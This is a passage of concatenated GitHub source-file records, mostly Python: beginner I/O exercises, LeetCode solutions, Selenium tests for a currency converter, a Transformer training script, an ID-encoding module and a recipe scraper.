csv\n\n\ndef imprimir_nome_na_vertical():\n    nome = input(\"What is your name? \")\n\n    for letra in nome:\n        print(letra)\n\n\ndef somar_numeros():\n    numeros_input = input(\n        \"Enter the numbers to be added, separating them with spaces: \"\n    )\n\n    numeros = numeros_input.split()\n    soma = 0\n\n    for numero in numeros:\n        if not numero.isdigit():\n            return print(\n                f\"Error adding values, {numero} is an invalid value\",\n                file=sys.stderr,\n            )\n\n        soma += int(numero)\n\n    print(soma)\n\n\ndef impressoes_desempacotadas():\n    a, b = \"cd\"\n    print(a) # output: c\n    print(b) # output: d\n\n    # When a * is present in the unpacking, the values are\n    # unpacked as a list.\n    head, *tail = (\n        1,\n        2,\n        3,\n    )\n    print(head) # output: 1\n    print(tail) # output: [2, 3]\n\n\ndef tente_entrar_com_um_numero():\n    while True:\n        try:\n            int(input(\"Please enter a number: \"))\n            break\n        except ValueError:\n            print(\"Oops! That was no valid number. 
Try again...\")\n\n\ndef listar_reprovados():\n with open(\"notas.txt\", \"r\") as notas:\n for line in notas:\n nome, nota = line.split()\n if int(nota) < 6:\n with open(\"reprovados.txt\", \"a\") as reprovados:\n print(nome, file=reprovados)\n\n with open(\"reprovados.txt\", \"r\") as reprovados:\n for line in reprovados:\n print(line)\n\n\ndef manipular_json_com_pokemon():\n with open(\"pokemons.json\") as file:\n # content = file.read() # leitura do arquivo\n # # o conteúdo é transformado em estrutura python equivalente,\n # # dicionário neste caso. acessamos a chave results que é onde contém\n # # nossa lista de pokemons\n # pokemons = json.loads(content)[\"results\"]\n pokemons = json.load(file)[\"results\"]\n\n # Leitura de todos os pokemons\n with open(\"pokemons.json\") as file:\n pokemons = json.load(file)[\"results\"]\n\n # print(pokemons[0]) # imprime o primeiro pokemon da lista\n\n # Separamos somente os do tipo grama\n grass_type_pokemons = [\n pokemon for pokemon in pokemons if \"Grass\" in pokemon[\"type\"]\n ]\n\n # Abre o arquivo para escrevermos apenas o pokemons do tipo grama\n with open(\"grass_pokemons.json\", \"w\") as file:\n # json_to_write = json.dumps(\n # grass_type_pokemons\n # ) # conversão de Python para o formato json (str)\n # file.write(json_to_write)\n # escreve no arquivo já transformando em formato json a estrutura\n json.dump(grass_type_pokemons, file)\n\n\n# lê os dados\nwith open(\"graduacao_unb.csv\", encoding=\"utf-8\") as file:\n # graduacao_reader = csv.reader(file, delimiter=\",\", quotechar='\"')\n # # Usando o conceito de desempacotamento\n # header, *data = graduacao_reader\n graduacao_reader = csv.DictReader(file, delimiter=\",\", quotechar='\"')\n\n # print(data)\n\n # a linha de cabeçalhos é utilizada como chave do dicionário\n # agrupa cursos por departamento\n group_by_department = {}\n # for row in data:\n for row in graduacao_reader:\n # department = row[15]\n department = row[\"unidade_responsavel\"]\n if department not in group_by_department:\n group_by_department[department] = 0\n group_by_department[department] += 1\n\n # Escreve o relatório em .csv\n # Abre um arquivo para escrita\nwith open(\"department_report.csv\", \"w\", encoding=\"utf-8\") as file:\n # writer = csv.writer(file)\n\n # Escreve o cabeçalho\n # os valores a serem escritos devem ser dicionários\n headers = [\n \"Departamento\",\n \"Total de Cursos\",\n ]\n # writer.writerow(headers)\n # É necessário passar o arquivo e o cabeçalho\n writer = csv.DictWriter(file, fieldnames=headers)\n writer.writeheader()\n\n # Escreve as linhas de dados\n # Desempacotamento de valores\n for department, grades in group_by_department.items():\n # Agrupa o dado com o turno\n # row = [\n # department,\n # grades,\n # ]\n row = {\"Departamento\": department, \"Total de Cursos\": grades}\n writer.writerow(row)\n","repo_name":"alvesgf16/trybe-exercicios","sub_path":"ciencia-da-computacao/bloco-33-introducao-a-python/dia-02-entrada-e-saida-de-dados/comprehension_exercises.py","file_name":"comprehension_exercises.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74797444646","text":"#!/usr/bin/env python3\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n\n def dfs(self, root : TreeNode, path : int, digit : str) -> None:\n digit += str(root.val)\n if 
not root.left and not root.right:\n            self.ans += int(digit)\n            return\n        if root.left:\n            self.dfs(root.left, path, digit)\n        if root.right:\n            self.dfs(root.right, path, digit)\n\n    def sumNumbers(self, root: TreeNode) -> int:\n        self.ans = 0\n        self.dfs(root,0 ,\"\")\n\n        return self.ans","repo_name":"femifacia/algorithms","sub_path":"python/algorithms/sum_root_to_leaf_numbers/main_dfs_recursive_with_string.py","file_name":"main_dfs_recursive_with_string.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38211938272","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.common.exceptions import TimeoutException\nimport pytest\nimport allure\nfrom selenium.common.exceptions import NoSuchElementException\n\n\nclass StartEnd:\n    # open the browser and load the page\n    def setup_class(self):\n        self.driver = webdriver.Chrome()\n        self.driver.implicitly_wait(15)\n        self.driver.maximize_window()\n        self.driver.get('http://www.sberbank.ru/ru/quotes/converter')\n        with pytest.allure.step('Page loading'):\n            assert 'Калькулятор иностранных валют' in self.driver.title, 'The page did not load'\n\n    # close the browser\n    def teardown_class(self):\n        self.driver.quit()\n\n\nclass Driver:\n    def __init__(self, driver):\n        self.driver = driver\n\n\nclass Converter(Driver):\n    summ = \"//input[@placeholder='Сумма']\"\n    convFrom = \"//select[@name='converterFrom']/..\"\n    convTo = \"//select[@name='converterTo']/..\"\n    cash = \"//div[contains(concat(@class,' '),'kit-radio__text') and text()='Наличные']\"\n    choose_cash = \"//div[contains(concat(@class,' '),'kit-radio__text') and text()='Выдать наличные']\"\n    show_button = \"//button[@class='rates-button' and text()='Показать']\"\n    result_to = \"//span[@class='rates-converter-result__total-to']\"\n    convFrom_select = \"//select[@name='converterFrom']/..//strong\"\n    convTo_select = \"//select[@name='converterTo']/..//strong\" # find an element by xpath\n\n    def find(self, xpath):\n        try:\n            self.driver.find_element_by_xpath(xpath)\n        except NoSuchElementException:\n            return \"Invalid xpath!\"\n        return self.driver.find_element_by_xpath(xpath)\n\n    def get_text(self, xpath):\n        return self.driver.find_element_by_xpath(xpath).text\n\n    # enter the amount and convert\n    @pytest.fixture()\n    @pytest.allure.step('Entering the amount and converting')\n    def converter_func(self, input, output):\n\n        with pytest.allure.step('Entering new data into the \"Сумма\" field'):\n            # find and click the amount input field\n            summa = self.find(Converter.summ)\n            summa.click()\n            assert 'Failed to select the amount input field'\n\n            # clear the amount input field\n            summa.clear()\n            summa.clear()\n            summa.clear()\n            assert 'Failed to clear the amount input field'\n\n            # enter the data\n            summa.send_keys(input)\n            assert 'Failed to enter the data'\n\n        with pytest.allure.step('Displaying the result'):\n            # click the \"Показать\" (Show) button\n            button = self.find(self.show_button)\n            button.click()\n            assert 'Failed to click the \"Показать\" button'\n            # wait until the value in the result block updates (the digits before the comma match)\n            try:\n                WebDriverWait(self.driver, 10).until(ec.text_to_be_present_in_element((By.XPATH, self.result_to), output[:-3]))\n                text = self.find(self.result_to).text[:-4] # replace the comma with a dot to compare the result\n                text = text[:-3] + '.' 
+ text[-2:]\n                return text\n\n            except TimeoutException:\n                raise Exception('The value was not received')\n\n    # check the \"from\" currency list\n    @pytest.allure.step('Checks the currency list - \"from\"')\n    def from_currency_func(self, data):\n        xpath2 = \"//select[@name='converterFrom']/..//span[contains(text(),\" + \" '\" + data + \"'\" + \")]\"\n\n        # find and click the currency list\n        currency = self.find(self.convFrom)\n        currency.click()\n\n        with pytest.allure.step('Selecting a currency from the list'):\n            # find the currency in the list and select it\n            currency_item = self.find(xpath2)\n            currency_item.click()\n            return currency.text\n\n    # Check the \"to\" currency list\n    @pytest.allure.step('Checks the currency list - \"to\"')\n    def to_currency_func(self, data):\n        xpath2 = \"//select[@name='converterTo']/..//span[contains(text(),\" + \" '\" + data + \"'\" + \")]\"\n\n        # find and click the currency list\n        converterTo = self.find(self.convTo)\n        converterTo.click()\n\n        with pytest.allure.step('Selecting a currency from the list'):\n            # find the currency in the list and select it\n            currency_item = self.find(xpath2)\n            currency_item.click()\n            return converterTo.text\n","repo_name":"Mardonov/conv-calc","sub_path":"utils/steps.py","file_name":"steps.py","file_ext":"py","file_size_in_byte":5282,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9090778307","text":"class Solution(object):\n    def twoSum(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: List[int]\n        \"\"\"\n        s = set()\n        ret = [None, None]\n        for i, n in enumerate(nums):\n            if n in s:\n                ret[1] = i\n                ret[0] = nums.index(target - n)\n                break\n            s.add(target - n)\n            \n        return ret","repo_name":"casprwang/leetcode","sub_path":"solutions/001.two-sum/two-sum.py","file_name":"two-sum.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"4262220308","text":"import decimal\nimport numconv\nimport werkzeug.exceptions\n\nfrom . 
import inspect as ppi\nfrom .debug import pp_t\n\nURI_FOR_GENERAL_TASKS = 'pub'\nURI_FOR_NONE = 'index'\nURI_FOR_ERROR = 'error'\nURI_FOR_STATIC_FILES = 'static'\n\nMARKER_MODULUS = 1000\n\nclass Id(int):\n \"\"\"Represents a biv_id\"\"\"\n def __new__(cls, biv_id_or_marker, biv_index=None):\n \"\"\"Pass in an int, str, or existing biv_id\"\"\"\n if isinstance(biv_id_or_marker, cls):\n return biv_id_or_marker\n if isinstance(biv_id_or_marker, Marker):\n assert isinstance(biv_index, Index), repr(biv_index) \\\n + ': not Index'\n bi = biv_index * MARKER_MODULUS + biv_id_or_marker\n self = super().__new__(cls, bi)\n self.__marker = biv_id_or_marker\n self.__index = biv_index\n else:\n bi = int(biv_id_or_marker)\n assert MARKER_MODULUS < bi <= _MAX_ID, str(bi) + ': range'\n self = super().__new__(cls, bi)\n self.__marker = Marker(bi % MARKER_MODULUS)\n self.__index = Index(bi // MARKER_MODULUS)\n return self\n\n @property\n def biv_marker(self):\n \"\"\"Marker object for this Id\"\"\"\n return self.__marker\n\n @property\n def biv_index(self):\n \"\"\"Index object for this Id\"\"\"\n return self.__index\n\n def to_biv_uri(self, use_alias=True):\n \"\"\"Converts a biv_id to a biv_uri.\n\n :param use_alias: If False, creates encoded uri, always\n \"\"\"\n if use_alias:\n i = self.__int__()\n if i in _id_to_alias:\n return _id_to_alias[i][0]\n import publicprize.auth.model\n alias = publicprize.auth.model.BivAlias.query.filter_by(\n biv_id=i,\n ).first()\n if alias:\n return URI(alias.alias_name)\n return URI(self)\n\n\nclass Index(int):\n \"\"\"The sequenced part of an Id\"\"\"\n def __new__(cls, biv_index):\n if isinstance(biv_index, cls):\n return biv_index\n bi = int(biv_index)\n if 0 < bi <= _MAX_INDEX:\n return super().__new__(cls, bi)\n werkzeug.exceptions.abort(404)\n\n\nclass Marker(int):\n \"\"\"The type part of the Id\"\"\"\n def __new__(cls, biv_marker):\n if isinstance(biv_marker, cls):\n return biv_marker\n bm = int(biv_marker)\n assert 0 < bm <= _MAX_MARKER, str(biv_marker) + ': range'\n return super().__new__(cls, bm)\n\n def to_biv_id(self, biv_index):\n \"Convert an index value to a biv_id\"\n return Id(self, Index(biv_index))\n\n\nclass URI(str):\n \"\"\"Parses and stores an encoded biv_uri or an alias\"\"\"\n def __new__(cls, biv_uri_or_id):\n if isinstance(biv_uri_or_id, cls):\n return biv_uri_or_id\n if isinstance(biv_uri_or_id, (decimal.Decimal, int)):\n biv_uri_or_id = Id(biv_uri_or_id)\n if isinstance(biv_uri_or_id, Id):\n self = super().__new__(cls, cls.__encode(biv_uri_or_id))\n self.__id = biv_uri_or_id\n return self\n bu = str(biv_uri_or_id)\n self = super().__new__(cls, bu)\n if bu[0] == _ENC_PREFIX:\n self.__id = cls.__decode(bu)\n elif bu in _alias_to_id:\n self.__id = _alias_to_id[bu]\n else:\n import publicprize.auth.model\n alias = publicprize.auth.model.BivAlias.query.filter_by(\n alias_name=bu\n ).first_or_404()\n self.__id = Id(alias.biv_id)\n return self\n\n @property\n def biv_id(self):\n \"\"\"Returns Id for this URI\"\"\"\n return self.__id\n\n @staticmethod\n def __decode(biv_uri):\n bu = biv_uri[1:]\n assert len(bu) >= _MARKER_ENC_LEN, biv_uri + ': too short'\n bm = Marker(_CONV.str2int(bu[-_MARKER_ENC_LEN:]))\n i = _CONV.str2int(bu[:-_MARKER_ENC_LEN])\n return bm.to_biv_id(i)\n\n @staticmethod\n def __encode(biv_id):\n bm = _CONV.int2str(biv_id.biv_marker).zfill(_MARKER_ENC_LEN)\n bi = _CONV.int2str(biv_id.biv_index)\n return _ENC_PREFIX + bi + bm\n\n\ndef load_obj(biv_uri):\n \"\"\"Loads the object identified by biv_uri\"\"\"\n if biv_uri is None or 
isinstance(biv_uri, str) and len(biv_uri) == 0:\n biv_uri = URI_FOR_NONE\n bi = URI(biv_uri).biv_id\n pp_t('biv_uri={} biv_id={}', [biv_uri, bi])\n if bi.biv_marker not in _marker_to_class:\n pp_t('biv_marker={}', [bi.biv_marker])\n werkzeug.exceptions.abort(404)\n return _marker_to_class[bi.biv_marker].load_biv_obj(bi)\n\n\ndef register_alias(uri, biv_id):\n \"\"\"Registers biv_id with non-encoded uri\"\"\"\n assert uri not in _alias_to_id, uri + ': exists'\n assert not uri[0] == _ENC_PREFIX, uri + ': encoded uri'\n bi = Id(biv_id)\n _alias_to_id[uri] = bi\n bu = URI(uri)\n if bi not in _id_to_alias:\n _id_to_alias[bi] = []\n _id_to_alias[bi].append(bu)\n return bu\n\n\ndef register_marker(biv_marker, cls):\n \"\"\"Registers a marker in a global table for a model, which can\n load_biv_obj\"\"\"\n biv_marker = Marker(biv_marker)\n assert ppi.class_has_classmethod(cls, 'load_biv_obj'), str(cls) \\\n + ': missing load_biv_obj method'\n assert biv_marker not in _marker_to_class, str(biv_marker) + ': exists'\n _marker_to_class[biv_marker] = cls\n return Marker(biv_marker)\n\n_CONV = numconv.NumConv(radix=62, alphabet=numconv.BASE62)\n_ENC_PREFIX = '_'\n_IDEMPOTENT_URI = None\n_MAX_ID = int(1e18) - 1\n_MAX_INDEX = _MAX_ID // MARKER_MODULUS\n# We reserve 900 and above for versioning and growth\n_MAX_MARKER = MARKER_MODULUS - 101\n_MARKER_ENC_LEN = len(_CONV.int2str(_MAX_MARKER))\n_marker_to_class = {}\n_alias_to_id = {}\n_id_to_alias = {}\n","repo_name":"biviosoftware/publicprize","sub_path":"publicprize/biv.py","file_name":"biv.py","file_ext":"py","file_size_in_byte":5703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33383727151","text":"\"\"\"Get kth number\n\nurl: https://www.acmicpc.net/problem/1300\n\"\"\"\ndef kth_number(N, K):\n left, right = 1, K\n\n while left <= right:\n cnt = 0\n mid = (left + right) // 2\n\n for d in range(1, N+1):\n cnt += min(mid // d, N)\n\n if cnt < K:\n left = mid + 1\n else:\n ans = mid\n right = mid - 1\n\n return ans\n\n\nif __name__ == '__main__':\n N = int(input())\n K = int(input())\n print(kth_number(N, K))\n","repo_name":"shoark7/algorithm-with-python","sub_path":"problems_solving/baekjoon/no_1300_kth_number.py","file_name":"no_1300_kth_number.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"18223145388","text":"from typing import List\n\n\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n dictionary = {}\n for word in strs:\n sorted_word = ''.join(sorted(word))\n if sorted_word not in dictionary:\n dictionary[sorted_word] = [word]\n else:\n dictionary[sorted_word].append(word)\n return list(dictionary.values())\n\ndef main():\n strs = [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]\n print(Solution().groupAnagrams(strs))\n\nmain() ","repo_name":"TheArcus02/LeetCodeSolutions","sub_path":"groupAnagrams.py","file_name":"groupAnagrams.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32634750452","text":"# Multiple Linear Regression\n\n# Importing the libraries\nimport numpy as np\n# import matplotlib.pyplot as plt\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import r2_score\n\n# Importing the dataset\ndataset = pd.read_csv('student-mat.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 9].values\n\n# 
Encoding categorical data\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder = LabelEncoder()\nX[:, 0] = labelencoder.fit_transform(X[:, 0])\nonehotencoder = OneHotEncoder(categorical_features = [0])\nX = onehotencoder.fit_transform(X).toarray()\n\n# dmy Var - trpap if they are highly correlated - use the dummy \n# X = X[:, 1:]\n# Splitting the dataset into the Training set and Test set\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n# Fitting Multiple Linear Regression to the Training set\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n# Predicting the Test set results\ny_test_pred = regressor.predict(X_test)\ny_train_pred = regressor.predict(X_train)\n#print( \" this is the predicted output ******************************\")\n#print(y_pred)\n\n\n\n#print(\"this is the actual data\")\ndata =X_train[:,0:1]\n\nplt.plot(y_train, y_train_pred,'*r')\nplt.plot(y_test, y_test_pred, '*g')\nplt.figure()\n\nyTrainr2 = (r2_score(y_train, y_train_pred))\nYTest = (r2_score(y_test, y_test_pred))\n\n\n","repo_name":"rpasricha45/Federated-Learning-Research-NJIT","sub_path":"Experiments/Non Federated/multiple_linear_regression.py","file_name":"multiple_linear_regression.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75249548328","text":"\"\"\"Pipeline for training a Transformer model for neural machine translation. \n\"\"\"\nimport glob\nimport os\n\nimport tensorflow as tf\nfrom absl import app\nfrom absl import flags\n\nfrom commons import utils\nfrom commons import dataset\nfrom commons import tokenization\nfrom model import TransformerModel\nfrom model_runners import SequenceTransducerTrainer\n\n\nSUFFIX = '*.tfrecord'\n\nflags.DEFINE_string(\n 'data_dir', None, 'Path to the directory storing all TFRecord files (with '\n 'pattern *train*) for training.')\nflags.DEFINE_string(\n 'vocab_path', None, 'Path to the vocabulary file.')\nflags.DEFINE_string(\n 'model_dir', None, 'Path to the directory that checkpoint files will be '\n 'written to.')\n\nflags.DEFINE_integer(\n 'encoder_stack_size', 6, 'Num of layers in encoder stack.')\nflags.DEFINE_integer(\n 'decoder_stack_size', 6, 'Num of layers in decoder stack.')\nflags.DEFINE_integer(\n 'hidden_size', 512, 'The dimensionality of the embedding vector.')\nflags.DEFINE_integer(\n 'num_heads', 8, 'Num of attention heads.')\nflags.DEFINE_integer(\n 'filter_size', 2048, 'The depth of the intermediate dense layer of the'\n 'feed-forward sublayer.')\nflags.DEFINE_float(\n 'dropout_rate', 0.1, 'Dropout rate for the Dropout layers.')\n\nflags.DEFINE_integer(\n 'max_num_tokens', 4096, 'The maximum num of tokens in each batch.')\nflags.DEFINE_integer(\n 'max_length', 64, 'Source or target seqs longer than this will be filtered'\n ' out.')\nflags.DEFINE_integer(\n 'num_parallel_calls', 8, 'Num of TFRecord files to be processed '\n 'concurrently.')\n\nflags.DEFINE_float(\n 'learning_rate', 2.0, 'Base learning rate.')\nflags.DEFINE_float(\n 'learning_rate_warmup_steps', 16000, 'Number of warm-ups steps.')\nflags.DEFINE_float(\n 'optimizer_adam_beta1', 0.9, '`beta1` of Adam optimizer.')\nflags.DEFINE_float(\n 'optimizer_adam_beta2', 0.997, '`beta2` of Adam optimizer.')\nflags.DEFINE_float(\n 'optimizer_adam_epsilon', 1e-9, '`epsilon` of Adam 
optimizer.')\n\nflags.DEFINE_float(\n 'label_smoothing', 0.1, 'Amount of probability mass withheld for negative '\n 'classes.')\nflags.DEFINE_integer(\n 'num_steps', 100000, 'Num of training iterations (minibatches).')\nflags.DEFINE_integer(\n 'save_ckpt_per_steps', 5000, 'Every this num of steps to save checkpoint.')\n\n\nFLAGS = flags.FLAGS\n\ndef main(_): \n data_dir = FLAGS.data_dir\n vocab_path = FLAGS.vocab_path\n model_dir = FLAGS.model_dir\n\n encoder_stack_size = FLAGS.encoder_stack_size\n decoder_stack_size = FLAGS.decoder_stack_size\n hidden_size = FLAGS.hidden_size\n num_heads = FLAGS.num_heads\n filter_size = FLAGS.filter_size\n dropout_rate = FLAGS.dropout_rate\n\n max_num_tokens = FLAGS.max_num_tokens\n max_length = FLAGS.max_length\n num_parallel_calls = FLAGS.num_parallel_calls\n\n learning_rate = FLAGS.learning_rate\n learning_rate_warmup_steps = FLAGS.learning_rate_warmup_steps\n optimizer_adam_beta1 = FLAGS.optimizer_adam_beta1\n optimizer_adam_beta2 = FLAGS.optimizer_adam_beta2\n optimizer_adam_epsilon = FLAGS.optimizer_adam_epsilon \n\n label_smoothing = FLAGS.label_smoothing\n num_steps = FLAGS.num_steps\n save_ckpt_per_steps = FLAGS.save_ckpt_per_steps\n\n # transformer model\n subtokenizer = tokenization.restore_subtokenizer_from_vocab_files(vocab_path)\n vocab_size = subtokenizer.vocab_size \n model = TransformerModel(vocab_size=vocab_size,\n encoder_stack_size=encoder_stack_size,\n decoder_stack_size=decoder_stack_size,\n hidden_size=hidden_size, \n num_heads=num_heads,\n filter_size=filter_size,\n dropout_rate=dropout_rate)\n\n # training dataset\n builder = dataset.DynamicBatchDatasetBuilder(\n max_num_tokens, True, max_length, num_parallel_calls)\n filenames = sorted(glob.glob(os.path.join(data_dir, SUFFIX)))\n train_ds = builder.build_dataset(filenames)\n \n # learning rate and optimizer\n optimizer = tf.keras.optimizers.Adam(\n utils.LearningRateSchedule(learning_rate,\n hidden_size,\n learning_rate_warmup_steps),\n optimizer_adam_beta1, \n optimizer_adam_beta2, \n epsilon=optimizer_adam_epsilon)\n\n # checkpoint\n ckpt = tf.train.Checkpoint(model=model, optimizer=optimizer)\n\n # build trainer and start training\n trainer = SequenceTransducerTrainer(model, label_smoothing)\n trainer.train(\n train_ds, optimizer, ckpt, model_dir, num_steps, save_ckpt_per_steps)\n\n\nif __name__ == '__main__':\n flags.mark_flag_as_required('data_dir')\n flags.mark_flag_as_required('model_dir')\n flags.mark_flag_as_required('vocab_path')\n app.run(main)\n","repo_name":"chao-ji/tf-transformer","sub_path":"run_trainer.py","file_name":"run_trainer.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"71734581287","text":"from tkinter import *\nimport tkinter.messagebox as box\nwindow = Tk()\nwindow.title('Buffer Blaster')\nframe = Frame(window)\nlabel = Label(frame, text=\"buffer pushed to server\")\nlabel2 = Label(frame, text=\"buffer pulled from debugger\")\nentry = Entry(frame)\nentry2 = Entry(frame)\ndef dialog():\n str1 = entry.get()\n str1 = str1.replace('x', '')\n str1 = str1.replace(\"\\\\\", '')\n str1 = str1.upper()\n str2 = entry2.get() \n\n result1 = ''\n result2 = ''\n\n maxlen=len(str2) if len(str1) target + distance:\n break\n if fabs(target - sigma) < distance:\n distance = fabs(target - sigma)\n closest = sigma\n closest_n = n\n closest_m = m\n\n mat[n].append(sigma_n_m(n, m))\n\n\n print(\"closest to \", target, \" is (\", closest_n, \", \", closest_m, \") -> 
\", closest, \"; with a distance of \", distance)\n print(\"the area of the rectangle is -> \", closest_n * closest_m)\n print(\"done in: \", time.time() - t1, \" seconds.\")\n","repo_name":"Tyzeppelin/Project-Euler","sub_path":"problem85/problem85_v2.py","file_name":"problem85_v2.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16151810422","text":"import re\n\nvalid_phone = r'\\d\\d\\d/\\d+-\\d+'\n\nprint('Unesite vasu broj telefona: ')\nuser_phone = input()\n\nif re.match(valid_phone, user_phone):\n print('Uneli ste broj u ispravnom formatu.')\nelse:\n print('Broj koji ste uneli nije u ispravnom formatu!')\n","repo_name":"DavorKandic/py_regex_practice","sub_path":"is_valid_serbian_phone.py","file_name":"is_valid_serbian_phone.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2882936253","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom scraper import Scraper, get_text\n\n\ndef _get_recipe_page(recipe):\n title_element = recipe.find(\"h2\", class_=\"entry-title\")\n link = title_element.find(\"a\", class_=\"entry-title-link\")\n\n recipe_page = requests.get(link[\"href\"])\n recipe_soup = BeautifulSoup(recipe_page.content, \"html.parser\")\n recipe_results = recipe_soup.find(\"div\", class_=\"wprm-recipe-the-chunky-chef\")\n\n title_text = get_text(title_element)\n\n print(title_text)\n\n return [{\"title\": title_text, \"link\": link[\"href\"]}, recipe_results]\n\n\ndef find_ingredient_info(ingredient):\n amount = ingredient.find(\"span\", class_=\"wprm-recipe-ingredient-amount\")\n unit = ingredient.find(\"span\", class_=\"wprm-recipe-ingredient-unit\")\n name = ingredient.find(\"span\", class_=\"wprm-recipe-ingredient-name\")\n notes = ingredient.find(\"span\", class_=\"wprm-recipe-ingredient-notes\")\n\n return {\n \"amount\": get_text(amount),\n \"unit\": get_text(unit),\n \"name\": get_text(name),\n \"notes\": get_text(notes),\n }\n\n\ndef find_ingredient_group_info(group):\n group_title = group.find(\"h4\", class_=\"wprm-recipe-group-name\")\n group_ingredients_raw = group.find_all(\"li\", \"wprm-recipe-ingredient\")\n group_ingredients = list(map(find_ingredient_info, group_ingredients_raw))\n\n return {\"title\": get_text(group_title), \"ingredients\": group_ingredients}\n\n\ndef find_instruction_group_info(group):\n title = get_text(group.find(\"h4\", \"wprm-recipe-instruction-group-name\"))\n instructions = group.find_all(\"div\", \"wprm-recipe-instruction-text\")\n return {\n \"title\": title,\n \"instructions\": list(\n map(lambda instruction: get_text(instruction), instructions)\n ),\n }\n\n\nclass TheChunkyChefScraper(Scraper):\n @property\n def url(self):\n return \"https://www.thechunkychef.com/recipe-index/\"\n\n def should_continue(self, page_index):\n if page_index == 1:\n return True\n\n page = requests.get(self.url + \"page/\" + str(page_index - 1))\n soup = BeautifulSoup(page.content, \"html.parser\")\n results = soup.find(id=\"genesis-content\")\n next_button = results.find(\"li\", class_=\"pagination-next\")\n\n return bool(next_button)\n\n def get_recipes(self, page_index):\n page = requests.get(self.url + \"page/\" + str(page_index))\n soup = BeautifulSoup(page.content, \"html.parser\")\n results = soup.find(id=\"genesis-content\")\n recipe_blocks = results.find_all(\"article\", class_=\"post\")\n\n zipped_list = list(map(_get_recipe_page, 
recipe_blocks))\n\n self.recipes, self.raw_recipes = zip(*zipped_list)\n\n return self\n\n def get_description(self, recipe):\n recipe_description = get_text(recipe.find(\"div\", class_=\"wprm-recipe-summary\"))\n\n return {\"description\": recipe_description}\n\n def get_author(self, recipe):\n recipe_author_container = recipe.find(\"span\", class_=\"wprm-recipe-author\")\n\n if not recipe_author_container:\n return {\"author\": \"The Chunky Chef\"}\n\n author_link = recipe_author_container.find(\"a\", recursive=False)\n\n if author_link:\n # print({\"author\": get_text(author_link)})\n return {\"author\": get_text(author_link)}\n\n # print({\"author\": get_text(recipe_author_container)})\n return {\"author\": get_text(recipe_author_container)}\n\n def get_image_link(self, recipe):\n recipe_image_container = recipe.find(\"div\", \"wprm-recipe-image\")\n recipe_image = recipe_image_container.find(\"img\", recursive=False)\n recipe_image_link = None\n\n if recipe_image:\n try:\n recipe_image_link = recipe_image[\"data-src\"]\n except KeyError:\n pass\n\n return {\"image-link\": recipe_image_link}\n\n def get_servings(self, recipe):\n recipe_servings = get_text(recipe.find(\"span\", class_=\"wprm-recipe-servings\"))\n\n return {\"servings\": recipe_servings}\n\n def get_prep_time(self, recipe):\n recipe_prep_time_minutes = get_text(\n recipe.find(\"span\", class_=\"wprm-recipe-prep_time-minutes\")\n )\n recipe_prep_time_hours = get_text(\n recipe.find(\"span\", class_=\"wprm-recipe-prep_time-hours\")\n )\n\n time = 0\n\n if recipe_prep_time_hours:\n time += float(recipe_prep_time_hours) * 60\n\n if recipe_prep_time_minutes:\n time += float(recipe_prep_time_minutes)\n\n return {\"prep-time\": time}\n\n def get_cook_time(self, recipe):\n recipe_cook_time_minutes = get_text(\n recipe.find(\"span\", class_=\"wprm-recipe-cook_time-minutes\")\n )\n recipe_cook_time_hours = get_text(\n recipe.find(\"span\", class_=\"wprm-recipe-cook_time-hours\")\n )\n\n time = 0\n\n if recipe_cook_time_hours:\n time += float(recipe_cook_time_hours) * 60\n\n if recipe_cook_time_minutes:\n time += float(recipe_cook_time_minutes)\n\n return {\"cook-time\": time}\n\n def get_ingredient_groups(self, recipe):\n ingredient_groups_raw = recipe.find_all(\n \"div\", class_=\"wprm-recipe-ingredient-group\"\n )\n ingredient_groups = list(map(find_ingredient_group_info, ingredient_groups_raw))\n\n return {\"ingredient_groups\": ingredient_groups}\n\n def get_instruction_groups(self, recipe):\n recipe_instruction_groups_raw = recipe.find_all(\n \"div\", \"wprm-recipe-instruction-group\"\n )\n recipe_instruction_groups = list(\n map(find_instruction_group_info, recipe_instruction_groups_raw)\n )\n\n return {\"instruction_groups\": 